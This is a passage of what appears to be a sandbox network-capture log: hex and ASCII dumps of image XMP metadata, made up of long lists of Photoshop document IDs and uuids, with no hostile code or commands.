                                                                                                                                                                                    2023-01-05 07:58:10 UTC1015INData Raw: 69 3e 44 35 46 33 45 43 38 30 37 38 36 33 46 42 36 44 36 37 34 31 46 32 30 38 44 39 36 35 31 30 33 37 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 44 35 46 37 42 33 30 36 37 41 38 44 44 32 39 36 35 42 41 42 43 42 30 43 46 31 30 30 37 42 45 41 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 44 35 46 37 44 45 41 36 45 42 42 36 46 38 31 31 35 31 35 33 39 36 33 39 30 36 36 34 30 39 37 44 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 44 35 46 38 30 39 35 36 35 36 46 39 32 34 37 33 46 38 43 37 35 31 37 42 32 44 33 33 46 37 35 33 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 44 35 46 38 43 35 42 38 33 32 41 41 37 36 44 39 30 35 32 43 41 37 42 30 42 35 45 41 39 43 32 44 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 44 35 46
                                                                                                                                                                                    Data Ascii: i>D5F3EC807863FB6D6741F208D9651037</rdf:li> <rdf:li>D5F7B3067A8DD2965BABCB0CF1007BEA</rdf:li> <rdf:li>D5F7DEA6EBB6F811515396390664097D</rdf:li> <rdf:li>D5F8095656F92473F8C7517B2D33F753</rdf:li> <rdf:li>D5F8C5B832AA76D9052CA7B0B5EA9C2D</rdf:li> <rdf:li>D5F
                                                                                                                                                                                    2023-01-05 07:58:10 UTC1031INData Raw: 41 33 37 32 31 34 31 36 33 33 41 43 41 44 37 38 37 35 36 31 36 34 35 46 46 39 44 36 32 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 45 31 45 34 34 32 42 34 45 36 45 30 43 44 39 38 31 43 33 30 39 42 33 45 43 46 46 37 35 43 31 31 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 45 31 45 34 39 32 46 34 33 33 38 34 43 46 44 38 44 35 32 35 43 32 37 45 39 38 42 30 41 39 32 39 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 45 31 45 36 42 44 36 33 43 39 31 38 37 33 46 31 39 39 46 30 42 32 46 44 45 35 35 39 31 31 38 34 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 45 31 46 32 35 35 31 37 43 33 42 45 35 39 43 43 43 31 42 38 39 39 42 36 46 37 39 35 30 33 39 44 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 45 31 46 34 33 39 45 42
                                                                                                                                                                                    Data Ascii: A372141633ACAD787561645FF9D62</rdf:li> <rdf:li>E1E442B4E6E0CD981C309B3ECFF75C11</rdf:li> <rdf:li>E1E492F43384CFD8D525C27E98B0A929</rdf:li> <rdf:li>E1E6BD63C91873F199F0B2FDE5591184</rdf:li> <rdf:li>E1F25517C3BE59CCC1B899B6F795039D</rdf:li> <rdf:li>E1F439EB
                                                                                                                                                                                    2023-01-05 07:58:10 UTC1047INData Raw: 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 45 43 30 35 34 30 36 34 33 32 39 32 43 46 30 32 43 39 36 33 43 30 30 31 37 41 34 37 42 42 33 31 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 45 43 31 41 43 36 34 41 39 43 37 37 46 43 38 45 42 38 44 38 32 39 33 33 41 36 33 31 37 33 36 46 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 45 43 31 43 41 33 36 43 44 39 37 35 30 37 36 42 46 41 39 45 38 45 44 42 43 42 44 37 34 42 41 44 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 45 43 33 31 45 46 38 36 46 46 37 45 33 39 34 42 43 38 33 30 35 45 30 33 36 37 42 41 42 41 31 42 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 45 43 33 35 35 37 42 38 41 46 35 30 43 45 31 43 36 42 43 45 35 30 46 46 34 31 43 37 35 41 44 32 3c 2f 72 64 66 3a 6c 69 3e 20
                                                                                                                                                                                    Data Ascii: :li> <rdf:li>EC0540643292CF02C963C0017A47BB31</rdf:li> <rdf:li>EC1AC64A9C77FC8EB8D82933A631736F</rdf:li> <rdf:li>EC1CA36CD975076BFA9E8EDBCBD74BAD</rdf:li> <rdf:li>EC31EF86FF7E394BC8305E0367BABA1B</rdf:li> <rdf:li>EC3557B8AF50CE1C6BCE50FF41C75AD2</rdf:li>
                                                                                                                                                                                    2023-01-05 07:58:10 UTC1055INData Raw: 69 3e 20 3c 72 64 66 3a 6c 69 3e 46 30 46 38 45 30 46 41 42 33 33 46 41 42 45 31 41 33 32 39 35 42 38 34 36 38 33 42 33 45 36 39 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 46 30 46 41 31 44 42 43 44 41 39 34 46 41 43 44 46 31 33 31 46 43 41 35 35 46 35 44 32 43 35 34 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 46 30 46 43 31 46 32 36 45 45 43 43 31 42 44 43 44 38 34 32 36 31 43 31 44 46 37 38 44 44 43 36 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 46 31 30 30 36 33 30 42 37 44 43 41 39 31 41 37 33 37 37 44 45 36 31 43 35 44 32 31 45 41 46 39 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 46 31 30 32 33 43 36 37 39 42 37 30 43 39 31 39 31 43 31 39 43 36 33 30 42 38 46 33 36 42 37 42 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72
                                                                                                                                                                                    Data Ascii: i> <rdf:li>F0F8E0FAB33FABE1A3295B84683B3E69</rdf:li> <rdf:li>F0FA1DBCDA94FACDF131FCA55F5D2C54</rdf:li> <rdf:li>F0FC1F26EECC1BDCD84261C1DF78DDC6</rdf:li> <rdf:li>F100630B7DCA91A7377DE61C5D21EAF9</rdf:li> <rdf:li>F1023C679B70C9191C19C630B8F36B7B</rdf:li> <r
                                                                                                                                                                                    2023-01-05 07:58:10 UTC1071INData Raw: 39 43 46 35 45 31 42 30 36 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 46 42 39 46 32 39 42 35 31 30 33 37 31 32 39 46 34 33 30 32 43 44 38 32 39 38 39 44 33 30 31 36 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 46 42 41 30 31 37 38 44 35 36 32 39 42 44 38 32 33 38 36 45 43 37 44 36 42 36 32 34 36 37 43 36 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 46 42 41 36 38 38 32 35 34 32 33 31 39 46 30 30 43 32 34 35 39 38 34 34 43 35 33 32 35 31 34 41 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 46 42 41 39 38 44 46 38 44 45 35 33 45 33 34 30 43 44 34 33 42 32 39 43 38 34 37 44 33 38 39 41 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 46 42 41 42 45 34 38 32 46 31 45 44 33 45 39 46 30 33 31 39 46 45 35 30 35 41 30 36
                                                                                                                                                                                    Data Ascii: 9CF5E1B06</rdf:li> <rdf:li>FB9F29B51037129F4302CD82989D3016</rdf:li> <rdf:li>FBA0178D5629BD82386EC7D6B62467C6</rdf:li> <rdf:li>FBA6882542319F00C2459844C532514A</rdf:li> <rdf:li>FBA98DF8DE53E340CD43B29C847D389A</rdf:li> <rdf:li>FBABE482F1ED3E9F0319FE505A06
                                                                                                                                                                                    2023-01-05 07:58:10 UTC1087INData Raw: 69 64 3a 70 68 6f 74 6f 73 68 6f 70 3a 32 30 31 31 64 33 33 32 2d 61 32 30 64 2d 31 31 64 39 2d 62 65 62 66 2d 38 63 35 32 63 66 32 36 62 32 34 62 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 61 64 6f 62 65 3a 64 6f 63 69 64 3a 70 68 6f 74 6f 73 68 6f 70 3a 32 30 31 39 31 38 37 37 2d 39 64 33 39 2d 31 31 65 36 2d 38 61 64 35 2d 38 63 32 39 35 37 38 34 32 61 63 61 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 61 64 6f 62 65 3a 64 6f 63 69 64 3a 70 68 6f 74 6f 73 68 6f 70 3a 32 30 34 32 37 37 64 39 2d 64 35 63 39 2d 35 39 34 65 2d 62 61 30 64 2d 38 34 33 63 36 34 35 36 63 33 35 61 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 61 64 6f 62 65 3a 64 6f 63 69 64 3a 70 68 6f 74 6f 73 68 6f 70 3a 32 30 34 66 34 39 61 39 2d 36 66 37 39 2d
                                                                                                                                                                                    Data Ascii: id:photoshop:2011d332-a20d-11d9-bebf-8c52cf26b24b</rdf:li> <rdf:li>adobe:docid:photoshop:20191877-9d39-11e6-8ad5-8c2957842aca</rdf:li> <rdf:li>adobe:docid:photoshop:204277d9-d5c9-594e-ba0d-843c6456c35a</rdf:li> <rdf:li>adobe:docid:photoshop:204f49a9-6f79-
                                                                                                                                                                                    2023-01-05 07:58:10 UTC1095INData Raw: 61 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 61 64 6f 62 65 3a 64 6f 63 69 64 3a 70 68 6f 74 6f 73 68 6f 70 3a 33 37 33 63 64 63 65 66 2d 64 31 62 34 2d 31 31 64 38 2d 62 33 31 66 2d 62 34 64 37 65 64 64 34 62 36 32 31 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 61 64 6f 62 65 3a 64 6f 63 69 64 3a 70 68 6f 74 6f 73 68 6f 70 3a 33 37 38 63 31 65 36 35 2d 38 35 39 32 2d 31 31 37 38 2d 62 65 31 38 2d 63 30 37 34 62 61 33 36 62 30 33 63 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 61 64 6f 62 65 3a 64 6f 63 69 64 3a 70 68 6f 74 6f 73 68 6f 70 3a 33 37 38 66 62 34 34 32 2d 30 35 34 31 2d 31 31 64 63 2d 61 37 38 36 2d 63 30 35 63 39 31 65 36 34 32 39 63 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 61 64 6f 62 65 3a 64 6f
                                                                                                                                                                                    Data Ascii: a</rdf:li> <rdf:li>adobe:docid:photoshop:373cdcef-d1b4-11d8-b31f-b4d7edd4b621</rdf:li> <rdf:li>adobe:docid:photoshop:378c1e65-8592-1178-be18-c074ba36b03c</rdf:li> <rdf:li>adobe:docid:photoshop:378fb442-0541-11dc-a786-c05c91e6429c</rdf:li> <rdf:li>adobe:do
                                                                                                                                                                                    2023-01-05 07:58:10 UTC1143INData Raw: 32 32 32 37 39 2d 37 32 36 31 2d 31 31 65 31 2d 38 30 33 64 2d 61 62 36 36 33 30 36 35 31 62 39 36 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 61 64 6f 62 65 3a 64 6f 63 69 64 3a 70 68 6f 74 6f 73 68 6f 70 3a 36 30 62 32 32 32 37 65 2d 37 32 36 31 2d 31 31 65 31 2d 38 30 33 64 2d 61 62 36 36 33 30 36 35 31 62 39 36 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 61 64 6f 62 65 3a 64 6f 63 69 64 3a 70 68 6f 74 6f 73 68 6f 70 3a 36 30 63 36 30 61 30 35 2d 33 62 66 36 2d 31 31 65 37 2d 62 38 30 32 2d 39 32 65 39 33 39 64 61 30 39 30 37 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 61 64 6f 62 65 3a 64 6f 63 69 64 3a 70 68 6f 74 6f 73 68 6f 70 3a 36 30 63 36 63 34 62 34 2d 35 39 63 38 2d 31 31 37 38 2d 62 39 37 35 2d 39 33 62 63 39 33
                                                                                                                                                                                    Data Ascii: 22279-7261-11e1-803d-ab6630651b96</rdf:li> <rdf:li>adobe:docid:photoshop:60b2227e-7261-11e1-803d-ab6630651b96</rdf:li> <rdf:li>adobe:docid:photoshop:60c60a05-3bf6-11e7-b802-92e939da0907</rdf:li> <rdf:li>adobe:docid:photoshop:60c6c4b4-59c8-1178-b975-93bc93
                                                                                                                                                                                    2023-01-05 07:58:10 UTC1167INData Raw: 72 64 66 3a 6c 69 3e 61 64 6f 62 65 3a 64 6f 63 69 64 3a 70 68 6f 74 6f 73 68 6f 70 3a 38 39 32 38 33 34 64 61 2d 30 33 64 64 2d 31 31 65 37 2d 61 34 66 39 2d 39 66 61 39 32 63 64 66 63 37 33 37 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 61 64 6f 62 65 3a 64 6f 63 69 64 3a 70 68 6f 74 6f 73 68 6f 70 3a 38 39 34 38 39 33 62 64 2d 65 38 35 66 2d 31 31 37 39 2d 61 37 61 31 2d 62 36 65 32 39 33 37 64 37 65 33 66 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 61 64 6f 62 65 3a 64 6f 63 69 64 3a 70 68 6f 74 6f 73 68 6f 70 3a 38 39 38 31 30 35 36 35 2d 32 34 30 61 2d 31 31 64 63 2d 38 31 30 30 2d 61 61 63 38 38 65 62 62 36 35 31 62 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 61 64 6f 62 65 3a 64 6f 63 69 64 3a 70 68 6f 74 6f 73 68 6f
                                                                                                                                                                                    Data Ascii: rdf:li>adobe:docid:photoshop:892834da-03dd-11e7-a4f9-9fa92cdfc737</rdf:li> <rdf:li>adobe:docid:photoshop:894893bd-e85f-1179-a7a1-b6e2937d7e3f</rdf:li> <rdf:li>adobe:docid:photoshop:89810565-240a-11dc-8100-aac88ebb651b</rdf:li> <rdf:li>adobe:docid:photosho
                                                                                                                                                                                    2023-01-05 07:58:10 UTC1175INData Raw: 38 35 37 63 2d 64 36 61 39 66 34 61 38 66 32 39 66 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 61 64 6f 62 65 3a 64 6f 63 69 64 3a 70 68 6f 74 6f 73 68 6f 70 3a 61 33 38 64 61 36 37 62 2d 31 38 32 33 2d 31 31 65 36 2d 39 36 33 66 2d 63 37 62 38 61 39 35 64 62 35 63 31 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 61 64 6f 62 65 3a 64 6f 63 69 64 3a 70 68 6f 74 6f 73 68 6f 70 3a 61 33 62 35 66 30 39 34 2d 64 39 38 65 2d 31 31 37 38 2d 61 32 30 64 2d 61 66 32 65 66 39 63 31 39 37 64 66 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 61 64 6f 62 65 3a 64 6f 63 69 64 3a 70 68 6f 74 6f 73 68 6f 70 3a 61 33 63 32 38 31 30 62 2d 61 62 63 38 2d 66 65 34 62 2d 62 32 33 62 2d 30 61 31 66 31 66 36 39 34 33 61 33 3c 2f 72 64 66 3a 6c 69 3e 20
                                                                                                                                                                                    Data Ascii: 857c-d6a9f4a8f29f</rdf:li> <rdf:li>adobe:docid:photoshop:a38da67b-1823-11e6-963f-c7b8a95db5c1</rdf:li> <rdf:li>adobe:docid:photoshop:a3b5f094-d98e-1178-a20d-af2ef9c197df</rdf:li> <rdf:li>adobe:docid:photoshop:a3c2810b-abc8-fe4b-b23b-0a1f1f6943a3</rdf:li>
                                                                                                                                                                                    2023-01-05 07:58:10 UTC1191INData Raw: 64 6f 63 69 64 3a 70 68 6f 74 6f 73 68 6f 70 3a 64 33 31 63 65 65 37 38 2d 64 30 38 31 2d 31 31 37 38 2d 38 35 30 63 2d 63 33 63 31 33 34 39 66 64 31 66 66 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 61 64 6f 62 65 3a 64 6f 63 69 64 3a 70 68 6f 74 6f 73 68 6f 70 3a 64 33 33 39 33 64 31 37 2d 33 39 62 65 2d 31 31 65 37 2d 62 33 36 66 2d 66 38 31 66 37 39 39 32 32 33 61 36 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 61 64 6f 62 65 3a 64 6f 63 69 64 3a 70 68 6f 74 6f 73 68 6f 70 3a 64 33 34 38 31 39 39 35 2d 31 62 65 37 2d 31 31 64 61 2d 62 32 34 63 2d 62 65 32 36 64 62 62 34 32 37 64 39 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 61 64 6f 62 65 3a 64 6f 63 69 64 3a 70 68 6f 74 6f 73 68 6f 70 3a 64 34 63 63 65 35 31 64 2d 65 34
                                                                                                                                                                                    Data Ascii: docid:photoshop:d31cee78-d081-1178-850c-c3c1349fd1ff</rdf:li> <rdf:li>adobe:docid:photoshop:d3393d17-39be-11e7-b36f-f81f799223a6</rdf:li> <rdf:li>adobe:docid:photoshop:d3481995-1be7-11da-b24c-be26dbb427d9</rdf:li> <rdf:li>adobe:docid:photoshop:d4cce51d-e4
                                                                                                                                                                                    2023-01-05 07:58:10 UTC1207INData Raw: 65 37 65 66 61 61 38 38 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 61 64 6f 62 65 3a 64 6f 63 69 64 3a 70 68 6f 74 6f 73 68 6f 70 3a 66 63 37 31 63 65 38 34 2d 39 36 32 35 2d 31 31 37 37 2d 38 39 61 35 2d 65 66 34 34 31 32 39 33 38 62 35 61 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 61 64 6f 62 65 3a 64 6f 63 69 64 3a 70 68 6f 74 6f 73 68 6f 70 3a 66 63 61 39 62 65 31 63 2d 63 32 66 39 2d 31 31 65 36 2d 62 30 38 65 2d 39 63 61 38 64 30 38 30 34 61 66 38 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 61 64 6f 62 65 3a 64 6f 63 69 64 3a 70 68 6f 74 6f 73 68 6f 70 3a 66 63 64 66 38 37 30 64 2d 37 66 31 38 2d 61 64 34 66 2d 38 61 61 65 2d 33 62 35 62 61 36 65 33 30 32 64 30 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 61
                                                                                                                                                                                    Data Ascii: e7efaa88</rdf:li> <rdf:li>adobe:docid:photoshop:fc71ce84-9625-1177-89a5-ef4412938b5a</rdf:li> <rdf:li>adobe:docid:photoshop:fca9be1c-c2f9-11e6-b08e-9ca8d0804af8</rdf:li> <rdf:li>adobe:docid:photoshop:fcdf870d-7f18-ad4f-8aae-3b5ba6e302d0</rdf:li> <rdf:li>a
                                                                                                                                                                                    2023-01-05 07:58:10 UTC1215INData Raw: 35 44 36 38 32 46 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 75 75 69 64 3a 31 36 36 38 36 34 45 44 44 45 44 42 31 31 44 42 41 33 32 44 45 32 44 44 42 34 32 32 38 34 31 38 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 75 75 69 64 3a 31 37 31 45 38 36 35 36 35 45 31 46 44 44 31 31 41 46 34 36 41 43 30 44 44 42 30 33 41 35 38 33 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 75 75 69 64 3a 31 37 33 45 31 45 44 45 33 33 38 34 44 46 31 31 38 33 39 46 45 31 46 36 45 32 38 36 43 45 45 41 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 75 75 69 64 3a 31 37 36 33 33 31 42 44 33 44 34 33 44 43 31 31 38 36 44 37 45 45 34 31 41 38 30 38 44 34 45 31 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 75 75 69 64 3a 31 37 38 39 36 31
                                                                                                                                                                                    Data Ascii: 5D682F</rdf:li> <rdf:li>uuid:166864EDDEDB11DBA32DE2DDB4228418</rdf:li> <rdf:li>uuid:171E86565E1FDD11AF46AC0DDB03A583</rdf:li> <rdf:li>uuid:173E1EDE3384DF11839FE1F6E286CEEA</rdf:li> <rdf:li>uuid:176331BD3D43DC1186D7EE41A808D4E1</rdf:li> <rdf:li>uuid:178961
                                                                                                                                                                                    2023-01-05 07:58:10 UTC1231INData Raw: 44 42 31 31 39 35 39 46 45 35 36 44 34 32 44 31 42 39 36 32 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 75 75 69 64 3a 34 45 32 38 43 44 30 42 45 35 42 30 44 45 31 31 41 43 42 33 41 34 42 33 45 39 44 38 30 39 41 39 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 75 75 69 64 3a 34 45 32 43 36 44 43 39 38 32 46 32 45 30 31 31 41 41 31 42 45 42 41 43 44 35 44 34 30 36 46 32 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 75 75 69 64 3a 34 45 38 36 33 43 44 42 34 32 30 36 44 45 31 31 38 45 32 36 44 45 31 33 30 43 38 34 31 45 36 42 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 75 75 69 64 3a 34 45 43 44 35 33 42 35 39 38 33 36 45 30 31 31 38 43 33 42 41 35 35 44 44 33 37 44 35 33 35 43 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a
                                                                                                                                                                                    Data Ascii: DB11959FE56D42D1B962</rdf:li> <rdf:li>uuid:4E28CD0BE5B0DE11ACB3A4B3E9D809A9</rdf:li> <rdf:li>uuid:4E2C6DC982F2E011AA1BEBACD5D406F2</rdf:li> <rdf:li>uuid:4E863CDB4206DE118E26DE130C841E6B</rdf:li> <rdf:li>uuid:4ECD53B59836E0118C3BA55DD37D535C</rdf:li> <rdf:
                                                                                                                                                                                    2023-01-05 07:58:10 UTC1247INData Raw: 3e 20 3c 72 64 66 3a 6c 69 3e 75 75 69 64 3a 37 45 30 42 42 37 36 39 39 39 37 30 44 45 31 31 39 43 30 33 43 37 31 36 45 46 43 38 46 43 36 46 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 75 75 69 64 3a 37 45 34 37 38 33 36 33 38 42 43 35 44 46 31 31 38 31 44 41 38 46 38 37 32 46 33 43 32 46 45 36 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 75 75 69 64 3a 37 45 37 39 45 34 41 33 41 31 34 30 45 30 31 31 38 34 36 35 43 32 41 42 41 35 31 31 42 34 38 34 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 75 75 69 64 3a 37 45 38 45 34 30 35 39 32 35 33 31 45 30 31 31 39 37 36 38 44 45 32 46 35 32 31 31 32 46 36 42 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 75 75 69 64 3a 37 45 46 37 46 43 41 35 32 43 33 43 31 31 44 45 38 36 30 39
                                                                                                                                                                                    Data Ascii: > <rdf:li>uuid:7E0BB7699970DE119C03C716EFC8FC6F</rdf:li> <rdf:li>uuid:7E4783638BC5DF1181DA8F872F3C2FE6</rdf:li> <rdf:li>uuid:7E79E4A3A140E0118465C2ABA511B484</rdf:li> <rdf:li>uuid:7E8E40592531E0119768DE2F52112F6B</rdf:li> <rdf:li>uuid:7EF7FCA52C3C11DE8609
                                                                                                                                                                                    2023-01-05 07:58:10 UTC1254INData Raw: 44 36 42 31 38 30 38 44 46 31 31 42 34 38 33 41 38 44 35 39 33 30 32 30 44 43 31 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 75 75 69 64 3a 39 36 34 41 32 44 46 34 44 44 44 46 45 30 31 31 42 38 39 34 42 44 36 46 33 42 45 45 33 35 36 43 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 75 75 69 64 3a 39 36 42 38 43 36 36 30 33 35 32 31 31 31 45 30 42 38 37 45 41 42 43 41 30 42 32 37 34 37 43 36 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 75 75 69 64 3a 39 36 42 38 43 36 36 32 33 35 32 31 31 31 45 30 42 38 37 45 41 42 43 41 30 42 32 37 34 37 43 36 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 75 75 69 64 3a 39 36 43 44 35 36 30 36 38 42 43 43 44 45 31 31 41 42 36 44 46 38 35 45 32 43 43 46 43 35 31 34 3c 2f 72 64 66 3a 6c 69
                                                                                                                                                                                    Data Ascii: D6B1808DF11B483A8D593020DC1</rdf:li> <rdf:li>uuid:964A2DF4DDDFE011B894BD6F3BEE356C</rdf:li> <rdf:li>uuid:96B8C660352111E0B87EABCA0B2747C6</rdf:li> <rdf:li>uuid:96B8C662352111E0B87EABCA0B2747C6</rdf:li> <rdf:li>uuid:96CD56068BCCDE11AB6DF85E2CCFC514</rdf:li
                                                                                                                                                                                    2023-01-05 07:58:10 UTC1270INData Raw: 32 44 38 46 33 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 75 75 69 64 3a 44 30 33 44 44 46 34 35 46 30 41 44 44 46 31 31 41 34 36 45 42 36 41 39 45 43 33 37 41 34 37 43 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 75 75 69 64 3a 44 30 46 35 39 39 34 35 30 45 32 45 44 46 31 31 42 43 41 45 38 31 35 39 41 46 42 43 32 37 39 41 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 75 75 69 64 3a 44 31 39 42 38 41 38 44 38 45 36 45 44 46 31 31 38 37 46 42 39 42 41 39 31 39 32 43 35 35 32 30 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 75 75 69 64 3a 44 31 44 45 35 35 30 39 38 33 44 45 44 44 31 31 42 31 38 32 44 35 44 41 30 38 32 46 37 33 43 39 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 75 75 69 64 3a 44 31 45 35 35 34 46
                                                                                                                                                                                    Data Ascii: 2D8F3</rdf:li> <rdf:li>uuid:D03DDF45F0ADDF11A46EB6A9EC37A47C</rdf:li> <rdf:li>uuid:D0F599450E2EDF11BCAE8159AFBC279A</rdf:li> <rdf:li>uuid:D19B8A8D8E6EDF1187FB9BA9192C5520</rdf:li> <rdf:li>uuid:D1DE550983DEDD11B182D5DA082F73C9</rdf:li> <rdf:li>uuid:D1E554F
                                                                                                                                                                                    2023-01-05 07:58:10 UTC1286INData Raw: 30 31 31 37 34 30 37 32 30 36 38 31 31 38 35 44 35 38 44 33 31 45 35 36 36 30 46 46 42 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 30 31 38 30 31 31 37 34 30 37 32 30 36 38 31 31 38 37 31 46 38 46 39 39 44 38 39 34 43 31 35 43 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 30 31 38 30 31 31 37 34 30 37 32 30 36 38 31 31 38 37 31 46 39 37 36 46 38 45 41 36 42 44 39 36 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 30 31 38 30 31 31 37 34 30 37 32 30 36 38 31 31 38 37 31 46 41 31 39 30 42 35 44 34 39 42 38 32 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 30 31 38 30 31 31 37 34 30 37 32 30 36 38 31 31 38 37 31 46 41 35 45 33 36 30
                                                                                                                                                                                    Data Ascii: 011740720681185D58D31E5660FFB</rdf:li> <rdf:li>xmp.did:0180117407206811871F8F99D894C15C</rdf:li> <rdf:li>xmp.did:0180117407206811871F976F8EA6BD96</rdf:li> <rdf:li>xmp.did:0180117407206811871FA190B5D49B82</rdf:li> <rdf:li>xmp.did:0180117407206811871FA5E360
                                                                                                                                                                                    2023-01-05 07:58:10 UTC1294INData Raw: 37 32 30 36 38 31 31 42 33 46 39 45 45 42 42 35 45 30 43 33 30 35 42 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 30 31 38 30 31 31 37 34 30 37 32 30 36 38 31 31 42 34 46 32 39 30 44 44 32 44 33 38 43 33 32 45 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 30 31 38 30 31 31 37 34 30 37 32 30 36 38 31 31 42 36 39 39 41 45 30 44 38 45 30 38 35 31 34 36 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 30 31 38 30 31 31 37 34 30 37 32 30 36 38 31 31 42 36 39 39 45 42 35 45 35 44 37 42 39 39 37 39 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 